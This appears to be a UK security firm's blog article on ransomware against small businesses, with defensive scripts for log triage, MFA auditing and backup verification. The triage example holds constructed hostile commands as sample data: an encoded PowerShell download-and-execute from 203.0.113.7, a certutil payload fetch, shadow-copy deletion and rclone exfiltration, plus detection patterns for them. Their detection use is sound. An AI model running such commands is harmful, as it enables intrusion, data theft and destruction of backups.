The SMB Ransomware Shift: Why Threat Actors Moved Downmarket
There's a phrase that keeps coming up in breach reports, insurer claim files, and intelligence briefings: “We didn't think we were a target.”
A 100-year-old UK logistics company said something similar before a single weak password let attackers encrypt their entire operation. They never recovered. Seven hundred people lost their jobs. The business closed.
That phrase is the most expensive assumption in UK business right now. The threat actors banking on it have built an entire industry around proving it wrong.
The economics behind the shift
For years, organised cybercrime groups focused on big game: banks, energy firms, government agencies, multinational supply chains. The payoff per hit was enormous. But the targets fought back. Large enterprises hired CISOs, built Security Operations Centres, deployed zero-trust architectures, and trained incident response teams that could contain a breach in hours.
Enterprise defences got expensive to crack. So the attackers did what any rational business does when margins shrink on premium products: they moved downmarket.
The maths works like this. A Fortune 500 company might pay a £4 million ransom, but it takes weeks of reconnaissance, custom tooling, and a team of specialists to breach one. A small accountancy firm or a regional logistics company might only pay £50,000 to £500,000, but with the right automation you can hit hundreds of them in a single campaign. The revenue per breach drops, but the volume more than compensates.
Forty-three per cent of all cyber attacks now target small organisations. UK SMBs lose an estimated £3.4 billion a year to inadequate cybersecurity. Since 2021, supply chain attacks involving SMEs have risen by over 400 per cent. This isn't a trend on the horizon. It already happened.
Ransomware is now a franchise operation
The enabler behind this pivot is a business model called Ransomware-as-a-Service, or RaaS. It works much like any franchise. A core group builds the malware, maintains the infrastructure, runs the extortion site, and handles ransom negotiations. Affiliates, the operators who actually break into networks and deploy the ransomware, sign up, execute attacks, and keep most of the revenue.
DragonForce, one of the most active RaaS gangs right now, offers affiliates 80 per cent of every ransom collected. The group provides the encryption malware, a public leak site for stolen data, and even a team that will phone and harass victims to pressure them into paying. Affiliates just need to find a way in.
Finding a way in has also been commoditised. A growing class of specialists called Initial Access Brokers do nothing but breach networks. They scan for vulnerabilities, exploit them, and sell that access to the highest bidder on criminal forums. One broker, one weak firewall, one ransomware affiliate, and a business that took twenty years to build can be locked up before anyone in the office notices.
LockBit dominated the RaaS market for several years until law enforcement disrupted it last year. Its affiliates didn't retire. They migrated to DragonForce and RansomHub. When RansomHub's infrastructure recently went dark, DragonForce moved to absorb their territory too. The names change. The volume of attacks doesn't.
Scattered Spider adds another layer. This English-speaking group partners with RaaS providers but brings its own speciality: social engineering. They're known for convincing help desks to reset credentials, manipulating staff over the phone, and targeting retail and professional services firms through human trust rather than technical exploits.
How the attacks actually work
A ransomware attack against an SME follows a predictable sequence. Every stage is a point where a basic control could have stopped the whole thing.
It starts with getting in. The three entry points haven't changed in years: a phishing email, an unpatched vulnerability in an internet-facing firewall or VPN appliance, or weak or reused credentials. What has changed is scale. Attackers now run automated scanners, increasingly with AI-assisted triage of the results, that sweep entire IP ranges looking for unpatched devices, exposed remote desktop services, and login pages that accept a bare username and password. Your business doesn't need to be interesting to anyone. It just needs to have an open port.
Once inside, the attacker's tooling runs quietly. It maps the network, works out where the valuable data lives (financial records, client files, databases, HR records), and establishes persistence so that it survives a reboot.
Then it spreads. Using tools already built into Windows (PowerShell, WMI, remote desktop, remote management utilities), attackers escalate their privileges and move laterally through the network. Security teams call this “living off the land” because the attacker uses your own administrative tools against you: there is no malware file to match a signature against, and the activity looks like an administrator at work.
Before anything gets encrypted, automated scripts copy sensitive data out to servers the attackers control. This is the setup for double extortion: pay to unlock your files, and pay again to stop your data being published online. For professional services firms (accountants, solicitors, consultants), this is where the real damage sits. Client data on a public leak site is a reputational event that no amount of technical recovery fixes.
Then comes the encryption itself. Typically a fast symmetric cipher such as AES scrambles every file the attacker can reach, including mapped drives and network shares, and the per-victim key is wrapped with an RSA public key so that only the attacker's private key can unwrap it. File extensions change. Systems stop working.
Finally, the ransom note. Pay in cryptocurrency within a deadline, typically 72 hours, or the price doubles. Refuse entirely and the stolen data goes public. Some groups now target VMware ESXi hypervisors directly, encrypting the virtual machine files so that every server on a host goes down at once, and any backups that live on the same virtualised infrastructure go with them.
The whole sequence, from first click to full encryption, can run in hours. Most SMEs find out they've been attacked when staff arrive at the office to find locked screens and a ransom note.
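Most of the stages above leave a trace in ordinary Windows process creation logs, and the commands involved are distinctive even when the tools are legitimate. The script below is an added example, not code from Bluestone Cyber: it runs a handful of detection rules over constructed Security event 4688 records (the hosts, users, IP address and command lines are made up) and tags each hit with the stage of the attack it corresponds to. It also decodes the base64 blob that encoded PowerShell commands hide behind, which is the single most useful thing to do with that kind of alert.

```python
import base64
import re

# Everything below is constructed for this example. The events mimic the
# fields of a Windows Security 4688 (process creation) record; the hosts,
# users, IP address and commands are made up.
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/s.ps1')"
    .encode("utf-16le")
).decode()

SAMPLE_EVENTS = [
    {"EventID": 4688, "Host": "FS01", "User": "CORP\\jsmith",
     "CommandLine": "\"C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE\""},
    {"EventID": 4688, "Host": "FS01", "User": "CORP\\jsmith",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"EventID": 4688, "Host": "FS01", "User": "CORP\\svc_backup",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.7/a.txt C:\\Windows\\Temp\\a.exe"},
    {"EventID": 4688, "Host": "DC01", "User": "CORP\\Administrator",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"EventID": 4688, "Host": "FS01", "User": "CORP\\svc_backup",
     "CommandLine": "rclone.exe copy \\\\FS01\\Finance mega:dump --transfers 8"},
]

# Each rule maps a command-line pattern to the stage of the attack described
# in the article. Patterns are deliberately broad; tune them on your own data.
RULES = [
    ("encoded_powershell", "living off the land",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|ec|en|enc|encodedcommand)\s", re.I)),
    ("lolbin_download", "tooling pulled in with built-in binaries",
     re.compile(r"certutil(?:\.exe)?\s.*-urlcache|bitsadmin(?:\.exe)?\s.*/transfer", re.I)),
    ("shadow_copy_deletion", "preparation for encryption",
     re.compile(r"vssadmin(?:\.exe)?\s+delete\s+shadows|wmic(?:\.exe)?\s+shadowcopy\s+delete", re.I)),
    ("bulk_exfil_tool", "data exfiltration before encryption",
     re.compile(r"\brclone(?:\.exe)?\s+(?:copy|sync|move)\b", re.I)),
]


def decode_encoded_command(cmdline):
    """Return the script hidden behind -EncodedCommand (base64 of UTF-16LE), or None."""
    m = re.search(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Run every rule over 4688 events and return the matches with context."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 4688:
            continue
        cmd = ev.get("CommandLine", "")
        for rule, stage, pattern in RULES:
            if not pattern.search(cmd):
                continue
            finding = {"rule": rule, "stage": stage, "host": ev["Host"],
                       "user": ev["User"], "cmd": cmd}
            if rule == "encoded_powershell":
                finding["decoded"] = decode_encoded_command(cmd)
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f"[{f['rule']}] {f['host']} {f['user']}: {f['stage']}")
        if f.get("decoded"):
            print("    decoded:", f["decoded"])
```

Two caveats for anyone lifting this into a real environment. Event 4688 only carries the command line if "Include command line in process creation events" is enabled in Group Policy, and it is off by default. Turning on PowerShell script block logging (event 4104) as well means the decoded script is logged for you, obfuscation included, rather than reconstructed after the fact.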
What recovery actually costs
The ransom itself is usually the smallest line on the bill. Typical demands against SMEs range from tens of thousands to several hundred thousand pounds, sometimes calibrated to roughly 10 per cent of annual revenue.
The real cost is everything around it. Recovery for a typical SME involves roughly seven weeks of downtime. During that time, the business needs breach coaches, specialist legal counsel, IT forensics teams, threat negotiators, and forensic accountants to calculate business interruption losses. If personal data was compromised and the breach is likely to put people at risk, the ICO expects notification within 72 hours of you becoming aware of it. Customers, suppliers, and payment providers all need to be told.
Ninety-five per cent of SMB breaches trace back to human error. A clicked link. A reused password. A patch that was never applied. The breach that shuts down a business often starts with something so small that nobody remembers it happening.
Sixty per cent of small businesses that suffer a serious cyber attack don't survive to their six-month anniversary.
What actually stops them
Here's what's frustrating about all of this. The defences that would have prevented most of these attacks already exist. None of them are new. They just weren't implemented.
Multi-factor authentication is where we always start with clients, and for good reason. If an employee's password is leaked, phished, or guessed, MFA stops the attacker from simply logging in with it. Enable it on everything: email, remote access, cloud platforms, admin consoles. Two caveats matter in practice. First, not all MFA is equal: a phishing kit that proxies the real login page can capture the session after the user approves the prompt, an attacker can spam push notifications until someone taps approve, and the help desk reset route that Scattered Spider relies on sidesteps the second factor entirely unless the desk verifies identity properly. Give administrators phishing-resistant methods (FIDO2 security keys or passkeys) rather than SMS codes or bare push prompts. Second, check that every user has actually completed enrolment and that a policy requires the second factor on every sign-in. “Turned on” is not the same as “enforced.” We see that distinction trip people up more than anything else.
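The enrolment check is easy to automate once you have an export of who has registered what. The script below is an added example, not Bluestone Cyber's own tooling: it reads a constructed export in the shape of Microsoft Graph's user registration details report (the field names userPrincipalName, isAdmin, isMfaRegistered and methodsRegistered and the method names are assumed from that report; every account is made up) and sorts the gaps so that administrators with no second factor come out first, followed by anyone relying only on a phone number.

```python
import json

# Constructed export in the shape of Microsoft Graph's user registration
# details report. The field names (userPrincipalName, isAdmin, isMfaRegistered,
# methodsRegistered) are assumed from that report; every record is made up.
SAMPLE_REPORT = json.dumps({"value": [
    {"userPrincipalName": "ceo@example.co.uk", "isAdmin": True,
     "isMfaRegistered": False, "methodsRegistered": []},
    {"userPrincipalName": "it.admin@example.co.uk", "isAdmin": True,
     "isMfaRegistered": True, "methodsRegistered": ["microsoftAuthenticatorPush"]},
    {"userPrincipalName": "finance@example.co.uk", "isAdmin": False,
     "isMfaRegistered": True, "methodsRegistered": ["mobilePhone"]},
    {"userPrincipalName": "temp.contractor@example.co.uk", "isAdmin": False,
     "isMfaRegistered": False, "methodsRegistered": []},
    {"userPrincipalName": "ops@example.co.uk", "isAdmin": False,
     "isMfaRegistered": True, "methodsRegistered": ["fido2SecurityKey", "mobilePhone"]},
]})

# Method names as they appear in that report (assumed). Phone-based methods
# are the weakest; FIDO2 keys and Windows Hello resist proxy phishing.
PHONE_BASED = {"mobilePhone", "alternateMobilePhone", "officePhone"}
PHISHING_RESISTANT = {"fido2SecurityKey", "windowsHelloForBusiness", "passKeyDeviceBound"}


def audit_mfa(report_json):
    """Group users by MFA gap so the worst cases (admins) surface first."""
    users = json.loads(report_json)["value"]
    gaps = {"admins_without_mfa": [], "users_without_mfa": [],
            "phone_only": [], "admins_without_phishing_resistant": []}
    for u in users:
        upn = u["userPrincipalName"]
        methods = set(u.get("methodsRegistered", []))
        if not u.get("isMfaRegistered"):
            key = "admins_without_mfa" if u.get("isAdmin") else "users_without_mfa"
            gaps[key].append(upn)
            continue
        # Registered, but is the method any good?
        if methods and methods <= PHONE_BASED:
            gaps["phone_only"].append(upn)
        if u.get("isAdmin") and not (methods & PHISHING_RESISTANT):
            gaps["admins_without_phishing_resistant"].append(upn)
    registered = sum(1 for u in users if u.get("isMfaRegistered"))
    gaps["coverage_pct"] = round(100.0 * registered / len(users), 1) if users else 0.0
    return gaps


if __name__ == "__main__":
    result = audit_mfa(SAMPLE_REPORT)
    print(f"MFA registration coverage: {result['coverage_pct']}%")
    for bucket in ("admins_without_mfa", "admins_without_phishing_resistant",
                   "users_without_mfa", "phone_only"):
        for upn in result[bucket]:
            print(f"  {bucket}: {upn}")
```

Registration is only half of the check. A user who has registered a method but is never challenged for it, because no policy requires it on sign-in, is exactly the "turned on but not enforced" case; confirm the sign-in policy separately, and re-run the registration audit whenever a starter joins.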
Then patching. Attackers scan for known vulnerabilities within days of a patch being released, because they know SMEs delay updates. The 14-day window that Cyber Essentials mandates for fixing critical and high severity vulnerabilities is a reasonable minimum. Pay particular attention to perimeter devices (firewalls, VPN appliances, remote access gateways) because those are the first things attackers probe. And get rid of anything still running Windows 7, XP, or any other system that no longer receives security updates. Those are open doors.
Backups done properly will save you even when everything else fails. The 3-2-1 rule: three copies of your data, on two different types of media, with one copy off-site. For ransomware the refinement that matters is that at least one copy must be offline or immutable, meaning nobody holding your network credentials can delete or overwrite it, because attackers hunt for backups before they encrypt and will wipe any copy they can reach. A copy they never touched removes their leverage entirely. Test the restore, too: a backup that has never been restored is a hope, not a control, and the test is what tells you how long recovery will actually take.
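A restore test is only meaningful if you can prove the restored files are the ones you backed up, which is what a checksum manifest recorded at backup time gives you. The script below is an added example, not code from Bluestone Cyber or any backup product: it builds a SHA-256 manifest of a small constructed file tree, takes a copy to stand in for the offline backup, simulates an encryptor running over the live copy (a trivial XOR and a renamed extension, labelled as a stand-in, not real ransomware behaviour), and then verifies both copies against the manifest. The live tree fails; the untouched copy passes. Directory names and file contents are made up.

```python
import hashlib
import os
import shutil
import tempfile
from pathlib import Path


def sha256_file(path, chunk=1 << 20):
    """Hash a file in chunks so large backups don't have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(root):
    """Map each relative path under root to its SHA-256. Record this at backup time."""
    root = Path(root)
    return {str(p.relative_to(root)).replace(os.sep, "/"): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def verify_restore(manifest, restored_root):
    """Compare a restored tree against the manifest taken when the backup was made."""
    restored = build_manifest(restored_root)
    missing = sorted(set(manifest) - set(restored))
    extra = sorted(set(restored) - set(manifest))
    changed = sorted(p for p in manifest if p in restored and restored[p] != manifest[p])
    return {"ok": not (missing or extra or changed),
            "missing": missing, "changed": changed, "extra": extra}


def simulate_ransomware(root, key=0x5A):
    """Constructed stand-in for an encryptor: scramble bytes, rename with a new extension."""
    for p in list(Path(root).rglob("*")):
        if p.is_file():
            p.write_bytes(bytes(b ^ key for b in p.read_bytes()))
            p.rename(p.parent / (p.name + ".locked"))


def demo():
    """Build a tiny file tree, back it up, attack the live copy, verify both."""
    work = Path(tempfile.mkdtemp())
    live, offline = work / "live", work / "offline_copy"
    (live / "finance").mkdir(parents=True)
    (live / "finance" / "ledger-2024.csv").write_text("date,amount\n2024-01-05,1200.00\n")
    (live / "clients.txt").write_text("Acme Ltd\nBeta plc\n")
    manifest = build_manifest(live)        # recorded when the backup was taken
    shutil.copytree(live, offline)         # the copy that is then taken offline
    simulate_ransomware(live)              # the attacker reaches the live data only
    result = {"live_after_attack": verify_restore(manifest, live),
              "offline_copy": verify_restore(manifest, offline)}
    shutil.rmtree(work)
    return result


if __name__ == "__main__":
    for name, r in demo().items():
        status = "OK" if r["ok"] else "FAILED"
        print(f"{name}: {status} missing={r['missing']} changed={r['changed']} extra={r['extra']}")
```

Store the manifest with the offline copy rather than only on the live network, otherwise the attacker can delete the evidence of what a good restore should look like at the same time as the backups. The same check run after a real restore drill is what turns "we have backups" into a measured recovery time.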
Nobody should have admin rights on the account they use for email and web browsing. Give administrators a separate account for admin tasks, and keep domain-level admin credentials off ordinary workstations entirely. If one account gets compromised, a least privilege model limits how far the attacker can move. You don't need enterprise-grade tooling for this. Just stop giving everyone the keys to everything.
When 95 per cent of breaches start with human error, staff training isn't optional. The phishing emails that worked five years ago, misspelled and obviously fake, have been replaced by AI-generated messages that are personalised, grammatically correct, and convincing enough to fool experienced professionals. Training has to keep pace with what is actually landing in inboxes.
And finally, write an incident response plan. Not a 50-page document. A one-page checklist. Who do you call first? How do you isolate the affected system? Where are the backup credentials stored? How do you notify the ICO? Who talks to customers? Working all of that out during a crisis, with your systems down, is how businesses make expensive mistakes. Working it out in advance costs nothing.
The supply chain question
One more thing that matters particularly for UK businesses.
Large enterprises and government bodies are tightening their supply chain security requirements. Cyber Essentials is already a standard filter for public sector procurement. Private sector primes are sending out security questionnaires that run to a hundred questions or more. If you're part of someone else's supply chain, your security posture is now their concern.
An SME that gets its security basics right isn't just protecting itself from ransomware. It can answer those supply chain questionnaires honestly. It can hold the Cyber Essentials badge. It can tell a prospective customer, with evidence, that working with them doesn't introduce risk. We've seen businesses win contracts specifically because the competitor couldn't demonstrate that.
The businesses that treat security as a cost to be minimised will find themselves losing contracts to businesses that treat it as a trust signal. That's already happening.
The bottom line
The threat actors have moved. They moved because the economics told them to. Enterprises got harder to crack, SMEs stayed soft, and the tooling to automate attacks against thousands of small businesses at once became cheap and accessible.
If you run a small business, automated tools are probing your public-facing infrastructure right now, looking for the unpatched firewall, the login page without MFA, the VPN appliance running last year's firmware. If they find something, the rest of the playbook runs itself.
The controls that stop it are within reach of any business willing to take them seriously. MFA, patching, offline backups, least privilege, staff awareness, a response plan. Six things. Most of them cost nothing beyond the time to implement them properly.
You're already being scanned. The only question is what they find.
Bluestone Cyber helps UK businesses assess their exposure to ransomware and implement the controls that actually matter. If you're not sure where your gaps are, get in touch. We'll tell you.